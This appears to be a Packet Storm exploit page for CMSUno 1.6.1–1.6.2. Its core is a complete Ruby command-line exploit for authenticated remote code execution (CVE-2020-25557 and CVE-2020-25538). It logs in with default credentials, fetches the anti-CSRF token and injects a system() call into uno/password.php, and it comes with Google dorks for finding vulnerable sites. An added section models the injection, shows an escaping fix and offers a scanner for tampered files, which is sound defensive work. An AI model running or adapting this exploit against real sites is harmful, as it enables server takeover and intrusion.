CMSUno 1.6.2 Remote Code Execution

  • CMSUno version 1.6.2 authenticated remote code execution exploit; it also works against 1.6.1 and fails against 1.6.3, which ships the fix. A logged-in user (default credentials cmsuno / 654321) submits action=sauvePass to uno/central.php; the handler writes the supplied user or lang value into uno/password.php as PHP source without escaping, and the next login includes that file, so a value that closes the string literal and appends a system() call runs the attacker's command. The user technique returns the command output, the lang technique is blind. The underlying vulnerabilities, CVE-2020-25557 ('user') and CVE-2020-25538 ('lang'), were discovered by Fatih Çelik, whose write-ups are dated 30 September 2020.
    MD5 | c9bd2539c27d5fd817353fb1531448fc

    #!/usr/bin/env ruby
    # Exploit
    ## Title: CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated)
    ## Google Dorks:
    ##   inurl:uno/central.php
    ##   inurl:uno/config.php
    ##   inurl:uno.php intitle:"CMSUno - Login"
    ## Author: noraj (Alexandre ZANNI) for SEC-IT (https://secit.fr)
    ## Author website: https://pwn.by/noraj/
    ## Date: 2021-01-15
    ## Vendor Homepage: https://www.boiteasite.fr/cmsuno.html
    ## Software Link: https://github.com/boiteasite/cmsuno/archive/1.6.2.tar.gz
    ## Version: 1.6.1, 1.6.2
    ## Tested on: CMSUno
    ## - 1.6.3 ❌
    ## - 1.6.2 ✅
    ## - 1.6.1 ✅
    ## - 1.6.0 ❌
    ## - 1.5.7 ❌
    ## Patch: Update to 1.6.3
    # Vulnerabilities
    ## Discoverer: Fatih Çelik
    ## Date: 2020/09/30
    ## Discoverer website: https://fatihhcelik.blogspot.com
    ## Discovered on CMSUno 1.6.2 and tested on Kali Linux 2020.2
    ## Vulnerability 1:
    ##   Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)
    ##   CVE: CVE-2020-25557
    ##   References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html
    ## Vulnerability 2:
    ##   Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)
    ##   CVE: CVE-2020-25538
    ##   References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html

    # Dependencies: gem install httpclient docopt
    require 'httpclient'
    require 'docopt'

    # username = 'cmsuno'
    # password = '654321'
    # root_url = 'http://localhost:5000/'
    # command = 'pwd'

    doc = <<~DOCOPT
      CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated)
      Usage:
        #{__FILE__} -r <url> -c <cmd> [-u <username>] [-p <password>] [-t <tech>] [--debug]
        #{__FILE__} -h | --help
      Options:
        -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder
        -u <username>, --user <username>      User name (if not default: cmsuno)
        -p <password>, --pass <password>      User password (if not default: 654321)
        -c <cmd>, --command <cmd>             Command to execute on the target
        -t <tech>, --technique <tech>         Technique: exploiting 'user' param (default, with output) or 'lang' param (blind)
        --debug                               Display arguments
        -h, --help                            Show this screen
      Examples:
        #{__FILE__} -r http://example.org -c id
        #{__FILE__} -r https://example.org:5000/cmsuno -c 'touch hackproof' -u john -p admin1234 -t lang
    DOCOPT

    # Fetch the anti-CSRF token ("unox"). Before login it is a hidden form field;
    # once authenticated it appears in an inline Unox='...' assignment instead.
    def get_unox(client, auth_status)
      print '[*] Fetching anti-CSRF token: '
      res = client.get(LOGIN_URL)
      regexp = if auth_status
                 /Unox='([a-f0-9]{32}?)'/
               else
                 /name="unox" value="([a-f0-9]{32}?)"/
               end
      match = regexp.match(res.body)
      abort "\n[-] Anti-CSRF token not found (wrong root URL or login failed?)" unless match
      token = match.captures[0].chomp
      puts token
      token
    end

    # Authenticate against uno.php and return the response body.
    def login(client, user, pass)
      data = {
        'unox' => get_unox(client, false),
        'user' => user,
        'pass' => pass
      }
      puts '[*] Logging in'
      res = client.post(LOGIN_URL, data)
      res.body
    end

    def exploit(client, user, pass, cmd, tech)
      # The payload closes the double-quoted PHP string the handler writes into
      # uno/password.php, re-sets $pass so the next login still succeeds, runs the
      # command, then closes the PHP block so the rest of the file is ignored.
      payload = "#{user}\";$pass='#{pass}';system('#{cmd}');?>// "
      # The body is sent as a raw string (no URL encoding), so a command containing
      # '&', '+', '%' or '#' has to be percent-encoded by the caller.
      case tech
      when 'user'
        data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=#{user}&pass0=#{pass}&user=#{payload}&pass=#{pass}&lang=en"
      when 'lang'
        data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=&pass0=&user=&pass=&lang=#{payload}"
      else
        raise 'Wrong exploitation technique argument value'
      end
      headers = {
        'X-Requested-With' => 'XMLHttpRequest'
      }
      # client.proxy = 'http://localhost:8080'
      puts "[*] Starting exploitation, using '#{tech}' param technique"
      client.post(VULNERABLE_URL, data, headers)
      # Login again with a fresh session to trigger uno/password.php; the command
      # output is everything in the response except the trailing login-page line.
      clnt2 = HTTPClient.new
      login(clnt2, user, pass).lines[..-2].join
    end

    begin
      args = Docopt.docopt(doc)
      pp args if args['--debug']
      username = args['--user'] || 'cmsuno'
      password = args['--pass'] || '654321'
      technique = args['--technique'] || 'user'
      LOGIN_URL = "#{args['--root-url']}/uno.php"
      VULNERABLE_URL = "#{args['--root-url']}/uno/central.php"
      clnt = HTTPClient.new
      login(clnt, username, password)
      output = exploit(clnt, username, password, args['--command'], technique)
      print '[*] Command output:'
      case technique
      when 'user'
        puts "\n#{output}"
      when 'lang'
        puts ' blind RCE, no output with this exploitation technique'
      end
    rescue Docopt::Exit => e
      puts e.message
    end
    
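The bug the exploit relies on is a code-generation flaw: user-supplied strings are interpolated into PHP source that is later included. The Ruby below is an added example, not part of noraj's exploit and not CMSUno code. It models a password file of the shape the payload implies (three quoted assignments; the real layout of uno/password.php is not shown on this page, so that is an assumption), shows that the same 'user' payload the exploit builds turns one assignment into three statements, shows a hardened generator that escapes the value as a PHP single-quoted literal so the payload stays data, and includes a small scanner (php_statements / injected?) that can be pointed at a recovered password.php during incident response to flag statements that are not plain assignments.

```ruby
# Added example: models the PHP-source injection behind CVE-2020-25557/25538.
# Not CMSUno code and not part of the exploit above; the password-file layout
# is an assumption reconstructed from the payload shape.

# Assumed shape of the regenerated uno/password.php: values dropped straight
# into double-quoted PHP string literals (the vulnerable pattern).
def unsafe_password_php(user, pass, lang)
  "<?php\n$user=\"#{user}\";\n$pass=\"#{pass}\";\n$lang=\"#{lang}\";\n?>\n"
end

# Serialise a value as a PHP single-quoted literal. Only backslash and the
# quote itself are special there, so escaping those two keeps any input,
# including '?>' and ';', inside the string.
def php_single_quoted(str)
  "'" + str.gsub(/[\\']/) { |c| "\\#{c}" } + "'"
end

# Hardened generator: same file, values emitted through php_single_quoted.
def safe_password_php(user, pass, lang)
  "<?php\n$user=#{php_single_quoted(user)};\n$pass=#{php_single_quoted(pass)};\n" \
    "$lang=#{php_single_quoted(lang)};\n?>\n"
end

# Minimal PHP scanner: returns the top-level statements found between <?php
# and ?>, splitting on ';' only outside string literals. Comments and heredocs
# are not handled, which is enough for a three-line credential file.
def php_statements(src)
  stmts = []
  cur = +''
  state = :html
  i = 0
  while i < src.length
    c = src[i]
    case state
    when :html
      if src[i, 5] == '<?php'
        state = :php
        i += 5
        next
      end
    when :php
      if src[i, 2] == '?>'
        stmts << cur.strip unless cur.strip.empty?
        cur = +''
        state = :html
        i += 2
        next
      elsif c == '"' || c == "'"
        state = (c == '"' ? :dq : :sq)
        cur << c
      elsif c == ';'
        stmts << cur.strip
        cur = +''
      else
        cur << c
      end
    when :dq, :sq
      cur << c
      if c == '\\' # backslash escape: consume the next character as well
        cur << src[i + 1].to_s
        i += 2
        next
      end
      state = :php if c == (state == :dq ? '"' : "'")
    end
    i += 1
  end
  stmts << cur.strip unless cur.strip.empty?
  stmts
end

# A legitimate credential file contains nothing but "$name=<string literal>"
# statements; anything else (a system() call, a second $pass) was injected.
ASSIGNMENT = /\A\$[A-Za-z_]\w*=(?:"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*')\z/

def injected?(php_src)
  php_statements(php_src).any? { |s| s !~ ASSIGNMENT }
end

if __FILE__ == $PROGRAM_NAME
  # Same payload the exploit's 'user' technique builds with the default credentials.
  payload = "cmsuno\";$pass='654321';system('id');?>// "
  puts "unsafe: #{php_statements(unsafe_password_php(payload, '654321', 'en')).inspect}"
  puts "safe:   #{php_statements(safe_password_php(payload, '654321', 'en')).inspect}"
  puts "injected? unsafe=#{injected?(unsafe_password_php(payload, '654321', 'en'))} " \
       "safe=#{injected?(safe_password_php(payload, '654321', 'en'))}"
end
```

Escaping is the minimal fix; storing the credentials in a non-executable format (for example JSON outside the web root) removes the PHP-in-PHP pattern entirely. The scanner tracks open/close tags and both quote styles but ignores comments and heredocs, so treat a clean verdict as a first pass, not proof that a file is untouched.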

    Source: packetstormsecurity.com
